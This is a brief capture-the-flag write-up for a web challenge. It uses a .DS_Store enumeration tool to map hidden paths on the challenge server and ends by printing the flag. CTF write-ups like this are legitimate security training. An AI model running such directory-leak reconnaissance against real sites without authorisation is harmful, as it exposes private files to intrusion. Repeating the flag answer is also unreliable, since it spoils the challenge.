# HabbyDabby's Secret Stash (web)

> HabbyDabby's hidden some stuff away on his web server
> that he created and wrote from scratch on his Mac. 
> See if you can find out what he's hidden and where 
> he's hidden it!
> 
> http://a.goodsecurity.fail/
> 
> by copperstick6

```
# python ds_store_exp.py a.goodsecurity.fail/.DS_Store
[+] http://a.goodsecurity.fail/.DS_Store
[+] http://a.goodsecurity.fail/index.html
[+] http://a.goodsecurity.fail/e/.DS_Store
[+] http://a.goodsecurity.fail/a
[+] http://a.goodsecurity.fail/e/d/.DS_Store
[+] http://a.goodsecurity.fail/e/d/e/.DS_Store
[+] http://a.goodsecurity.fail/e/d/e/flag.txt
```

Imprimo la flag:
```
# cat a.goodsecurity.fail/e/d/e/flag.txt 
utflag{mac_os_hidden_files_are_stupid}
```

Solucion: `utflag{mac_os_hidden_files_are_stupid}`

